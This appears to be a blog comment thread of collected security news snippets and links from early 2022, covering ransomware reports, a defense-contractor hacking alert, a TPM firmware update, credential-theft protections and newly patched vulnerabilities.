Tämä mekanismi torjuu kvanttitietokoneisiin pääsyn saavien hyökkääjien aiheuttaman laiteohjelmiston vioittumisen uhan ja lisää laitteen pitkän aikavälin kestävyyttä mahdollistamalla kvanttikestävän laiteohjelmiston päivityspolun. Standardoitu, käyttövalmis TPM tarjoaa vankan perustan PC-tietokoneiden, palvelimien ja yhdistettyjen laitteiden identiteetin ja ohjelmiston tilan turvalliselle määrittämiselle sekä tietojen eheyden ja luottamuksellisuuden suojaamiselle lepotilassa ja siirron aikana.
Infineonin uusin lisäys OPTIGA TPM -perheeseen on alan ensimmäinen TPM, joka tarjoaa laiteohjelmiston päivitysmekanismin 256-bittisellä avaimen pituudella sekä PQC:hen perustuvan lisätarkistuksen. Tällä vahvalla ja luotettavalla päivitysmekanismilla OPTIGA TPM SLB 9672 voidaan silti päivittää, jos vakioalgoritmeihin ei enää luoteta.
Tomi Engdahl says:
Google Cuts User Account Compromises in Half With Simple Change
The online tech giant auto-enabled two-step verification for more than 150 million users, throwing up steep hurdles against scammers and attackers.
https://www.darkreading.com/attacks-breaches/google-cuts-account-compromises-in-half-with-simple-change
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-will-soon-block-windows-password-theft/
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/fake-windows-11-upgrade-installers-infect-you-with-redline-malware/
Tomi Engdahl says:
https://www.darkreading.com/vulnerabilities-threats/google-paid-record-8-7-million-to-bug-hunters-in-2021
Tomi Engdahl says:
Microsoft Defender will soon block Windows password theft
https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-will-soon-block-windows-password-theft/
Microsoft is enabling a Microsoft Defender ‘Attack Surface Reduction’ security rule by default to block hackers’ attempts to steal Windows credentials from the LSASS process.
When threat actors compromise a network, they attempt to spread laterally to other devices by stealing credentials or using exploits.
One of the most common methods to steal Windows credentials is to gain admin privileges on a compromised device and then dump the memory of the Local Security Authority Server Service (LSASS) process running in Windows.
This memory dump contains NTLM hashes of Windows credentials of users who had logged into the computer that can be brute-forced for clear-text passwords or used in Pass-the-Hash attacks to login into other devices.
Tomi Engdahl says:
Backup Plays Key Role in Ransomware Response, But Not a Complete Solution
https://www.securityweek.com/backup-plays-key-role-ransomware-response-not-complete-solution
Ransomware attacks have increased in volume, sophistication and ransom demanded consistently over the last few years. According to published records, the education and retail industries are the most targeted.
The energy, oil and gas industries and local government are the most likely to pay a ransom demand; while manufacturing and production the most able – with local government and healthcare the least able – to restore systems from backup.
These details were published in risk management firm CyberSaint’s State of Ransomware Attacks Report 2022 (PDF). CyberSaint’s co-founder and CPO Padraic O’Reilly adds the proviso that there is an inherent and unavoidable bias in this method of data collection: the figures do not and cannot account for those victims that quietly pay the ransom without reporting the compromise.
There was a recent flurry of optimism following the Russian authorities’ arrest of REvil members in January 2022. The hope was for a decline in ransomware activity associated with a rise in international law enforcement cooperation. While there are some factors driving success in the fight against data extortion attacks, the threat still lurks. O’Reilly told SecurityWeek that he is hopeful for an improvement, but doesn’t necessarily expect one.
On February 9, 2022, CISA, the FBI, the NSA, Australia’s ACSC and the UK’s NCSC published a joint cybersecurity alert warning about trends showing an increased globalized threat of ransomware. It warned that “if the ransomware criminal business model continues to yield financial returns for ransomware actors, ransomware incidents will become more frequent.”
Tomi Engdahl says:
Stopping to learn equates to ceasing your success when it comes to cybersecurity certifications. Read more to upgrade your salary level.
[https://cybersecuritymate.com/cybersecurity.../](https://cybersecuritymate.com/cybersecurity-certifications-path/?fbclid=IwAR02DY4ndRszRmNk8wLwXnYJEgmJJJ84ft-maAVb9Uqh4PL7SDJJZ58nY44)
Tomi Engdahl says:
Researcher ‘reverses’ redaction, extracts words from pixelated image https://www.bleepingcomputer.com/news/security/researcher-reverses-redaction-extracts-words-from-pixelated-image/
A researcher has demonstrated how he was able to successfully recover text that had been redacted using the pixelation technique. Further, the researcher has released a GitHub tool that can be used by anyone to reconstruct text from obscure, pixelated images.
Tomi Engdahl says:
Corin Faife / The Verge:
CISA, FBI, and NSA say Russian state-sponsored hackers targeted US defense contractors for at least two years, acquiring export-controlled technology and more — The state-sponsored actors acquired information on weapons, aircraft design, and combat communications systems over a period of years
Russian hackers have obtained sensitive defense information technology by targeting US contractors, according to CISA
https://www.theverge.com/2022/2/16/22937554/russian-hackers-target-us-defense-contractors-nsa-cisa?scrolla=5eb6d68b7fedc32c19ef33b4
The state-sponsored actors acquired information on weapons, aircraft design, and combat communications systems over a period of years
Russian state-sponsored hackers have been targeting security-cleared US defense contractors for at least two years, according to an alert released Wednesday by the Cybersecurity and Infrastructure Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA).
According to the alert, Russian-backed actors had targeted cleared defense contractors (CDCs) and subcontractors that supported the Department of Defense (DoD) in a range of areas, including weapons and missile development, vehicle and aircraft design, surveillance and reconnaissance, and combat communications systems. Compromised entities include contractors supporting the US Army, Air Force, Navy, Space Force, DoD, and Intelligence programs.
Though there is no mention of classified documents being stolen, details suggest that the nature of the information gives a significant understanding of US military operations.
“The acquired information provides significant insight into U.S. weapons platforms development and deployment timelines, vehicle specifications, and plans for communications infrastructure and information technology,” the text of the alert said. “By acquiring proprietary internal documents and email communications, adversaries may be able to adjust their own military plans and priorities, hasten technological development efforts, inform foreign policymakers of U.S. intentions, and target potential sources for recruitment.”
Given the success of current efforts, the FBI, NSA, and CISA anticipate that Russian state-sponsored cyber actors will continue to target defense contractors for information in the near future.
Tomi Engdahl says:
This journalist’s Otter.ai scare is a reminder that cloud transcription isn’t completely private
A reminder of the tradeoffs for ease and simplicity
https://www.theverge.com/2022/2/16/22937766/go-read-this-otter-ai-transcription-data-privacy-report
A report recently published by Politico about the automated transcription service Otter.ai serves as a great reminder of how difficult it can be to keep things truly private in the age of cloud-based services. It starts off with a nerve-wracking story — the journalist interviewed Mustafa Aksu, a Uyghur human rights activist who could be a target of surveillance from the Chinese government. But though they took pains to keep their communication confidential, they used Otter to record the call — and a day later, they received a message from Otter asking about the purpose of the conversation with Aksu.
Obviously, it was a concerning email. After receiving mixed messages from an Otter support agent about whether the survey was real or not, the reporter went down a rabbit hole trying to figure out what had happened. He details his dive into the service’s privacy policy (which does let Otter share some info with third parties), and lays out how the ease and utility of transcription software can override critical thinking about where potentially sensitive data is ending up.
My journey down the rabbit hole of every journalist’s favorite app
Otter.ai has saved reporters countless hours transcribing interviews. Caveat emptor.
https://www.politico.com/news/2022/02/16/my-journey-down-the-rabbit-hole-of-every-journalists-favorite-app-00009216
Tomi Engdahl says:
https://www.securityweek.com/cambodia-delays-controversial-internet-gateway
Tomi Engdahl says:
Ransomware-Related Data Leaks Nearly Doubled in 2021: Report
https://www.securityweek.com/ransomware-related-data-leaks-nearly-doubled-2021-report
There was a significant increase in ransomware-related data leaks and interactive intrusions in 2021, according to the 2022 Global Threat Report released on Tuesday by endpoint security firm CrowdStrike.
The number of ransomware attacks that led to data leaks increased from 1,474 in 2020 to 2,686 in 2021, which represents an 82% increase. The sectors most impacted by data leaks in 2021 were industrial and engineering, manufacturing, and technology.
“The growth and impact of [big game hunting] in 2021 was a palpable force felt across all sectors and in nearly every region of the world. Although some adversaries and ransomware ceased operations in 2021, the overall number of operating ransomware families increased,” CrowdStrike said in its report.
Tomi Engdahl says:
Mexican Businessman Pleads Guilty in U.S. to Brokering Hacking Tools
https://www.securityweek.com/mexican-businessman-pleads-guilty-us-brokering-hacking-tools
A Mexican businessman has admitted in a United States federal court to conspiring to sell and use interception devices and hacking services from companies in Italy, Israel, and elsewhere.
The man, Carlos Guerrero, of Chula Vista, California, and Tijuana, Mexico, owned and operated multiple companies in the U.S. and Mexico.
Between 2014 and 2015, he brokered hacking devices and geolocation tools from an Italian company, and later tools and services from Israeli and other companies.
While the spyware vendors have not been named, they are likely Italy’s now-defunct Hacking Team and Israel’s NSO Group.
“In 2016 and 2017, for example, Guerrero marketed signal jammers, Wi-Fi interception tools, IMSI catchers, and the ability to hack WhatsApp messages to prospective clients in the U.S. and Mexico,” the U.S. Department of Justice says.
Tomi Engdahl says:
CoinDesk:
Canadian authorities have ordered regulated financial firms to cease transactions from 34 crypto wallets, worth over $870K, tied to funding the “Freedom Convoy” — Bitcoin, Ethereum, Litecoin, Monero and Cardano addresses are all on the list. — The Ontario Provincial Police …
Canada Sanctions 34 Crypto Wallets Tied to Trucker ‘Freedom Convoy’
Bitcoin, Ethereum, Litecoin, Monero and Cardano addresses are all on the list.
https://www.coindesk.com/policy/2022/02/16/canada-sanctions-34-crypto-wallets-tied-to-trucker-freedom-convoy/
Tomi Engdahl says:
Solving the Quantum Decryption ‘Harvest Now, Decrypt Later’ Problem
https://www.securityweek.com/solving-quantum-decryption-harvest-now-decrypt-later-problem
There are two important problems for encryption: the keys and their distribution. Distribution is generally done via asymmetric encryption – but the distribution can be intercepted, and the asymmetric encryption cracked.
This problem exists today, but the cracking problem will get many times worse with the expected arrival of quantum computers and their vastly superior processing capabilities. Asymmetric encryption will be the first to fall – Shor’s quantum algorithm is proven to work. This has led to the new attacker concept of ‘harvest now, decrypt later’.
Quantum resiliency firm Qrypt has now released a product, Qrypt Key Generation, designed to take asymmetric encryption out of the equation by eliminating the need for traditional key distribution.
https://www.qrypt.com/
Tomi Engdahl says:
High-Severity Vulnerability Found in Apache Database System Used by Major Firms
https://www.securityweek.com/high-severity-vulnerability-found-apache-database-system-used-major-firms
Researchers detail code execution vulnerability in Apache Cassandra
JFrog’s security researchers on Tuesday published full technical details on a high-severity remote code execution vulnerability addressed in the latest version of Apache Cassandra.
A distributed NoSQL database that offers high scalability, Cassandra is popular among organizations such as Netflix, Reddit, Twitter, Cisco, Constant Contact, Digg, Urban Airship, OpenX, and more, as well as among cloud-native and DevOps development circles.
Tracked as CVE-2021-44521 (CVSS score of 8.4), the newly patched vulnerability only affects non-default configurations of the database – which mitigates the fact that it is easy to exploit – leading to complete system compromise.
The security error only exists if functionality to create user-defined-functions (UDFs) for custom processing of data is enabled in Cassandra, and can be exploited only if the attacker has enough permissions to create UDFs. The configuration is non-default and it has been documented as unsafe.
Tomi Engdahl says:
CISA Urges Organizations to Patch Recent Chrome, Magento Zero-Days
https://www.securityweek.com/cisa-urges-organizations-patch-recent-chrome-magento-zero-days
The United States Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday announced that it has expanded its Known Exploited Vulnerabilities Catalog with nine more security flaws, including two recently addressed zero-days.
One of these is CVE-2022-24086, a critical-severity (CVSS score 9.8) vulnerability in Adobe Commerce and Magento. Described as an improper input validation bug, the security hole can be exploited to achieve remote code execution, without authentication.
On Sunday, Adobe released an emergency advisory to warn that it had observed very limited attacks targeting CVE-2022-24086.
The second zero-day vulnerability is CVE-2022-0609, a high-severity security defect in the Chrome browser that Google describes as a use-after-free issue in Animation, and which could also lead to code execution attacks.
On Monday, the Internet giant announced that it was aware of the existence of an exploit targeting CVE-2022-0609, but did not provide further information on observed attacks.
Tomi Engdahl says:
COVID’s Silver Lining: The Acceleration of the Extended IoT
https://www.securityweek.com/covid%E2%80%99s-silver-lining-acceleration-extended-iot
Acceleration of XIoT unlocked business opportunities and ignited security innovation
Most experts agree that over the past two years, COVID has accelerated digital transformation significantly – by five to 10 years – as has the convergence of physical and digital assets. Ransomware attacks against hospitals, oil pipelines, food supply chains, and other critical infrastructure brought into sharp focus the high criticality of cyber-physical systems (CPS) and their exposure to attacks. With more time, the security industry would have been better prepared to address the cyber risks of converged CPS. However, I’d like to argue that this acceleration and the functions it forced are the silver lining of the COVID pandemic. Here’s why.
Let’s start with defining what we mean by CPS. NIST defines CPS as “comprising interacting digital, analog, physical, and human components engineered for function through integrated physics and logic.” Other phrases include IoT, Industrial Internet, Smart Cities, Smart Grid and “Smart” Anything (e.g., cars, buildings, homes, manufacturing, hospitals, appliances).
For simplicity, these categories can be referred to holistically as the Extended IoT (XIoT), with three main components:
1. Industrial IoT (IIoT) and operational technology (OT) are all the cyber-physical processes and equipment such as programmable logic controllers (PLCs) that support critical processes in industrial environments. These systems are connected internally to workstations that can typically be accessed remotely for maintenance; other cyber components include IIoT devices such as smart sensors. The 16 critical infrastructure sectors as defined by CISA – from manufacturing to energy to transportation – rely on these interconnected processes and systems.
2. Healthcare IoT includes medical imaging equipment such as MRI machines and CT scanners, as well as internet of medical things (IoMT) devices such as smart vitals monitors and infusion pumps that support critical care delivery in healthcare environments. These systems are usually connected to organizations’ IT networks.
3. All other IoT devices used in smart cities, smart grids, Enterprise IoT, and smart “anything.”
Acceleration of the XIoT was net positive for a few reasons, as it:
• Unlocked business opportunities.
• Ignited security innovation.
• Prioritized cybersecurity at the board level.
• Raised executive awareness of XIoT.
In this landscape, security technologies that can deliver optimized, cross-platform solutions that cover full connectivity between the cyber and physical worlds are preferred by security teams. Given the range and complexity of XIoT, it’s understandable that CISOs want to consolidate their risk governance processes and have a comprehensive view across all aspects and elements of their networks, spanning industrial, healthcare, and enterprise environments. Efficiency and ease of use are also key considerations and we’ve seen a great deal of progress in those areas as organizations have had to move at warp speed to survive and thrive.
For the last two years we’ve operated under the cloud of COVID. But its silver lining has been the acceleration of the XIoT, the value it delivers to organizations, and the people they serve. With proof we can move forward faster, securely, there is no turning back. The opportunities to think and do differently are limitless, and exciting!
https://www.capgemini.com/service/digital-services/digital-engineering-and-manufacturing-services/iot-and-connected-products/internet-of-things-xiot-platform/
Tomi Engdahl says:
https://etn.fi/index.php/13-news/13186-naein-trickbot-toimii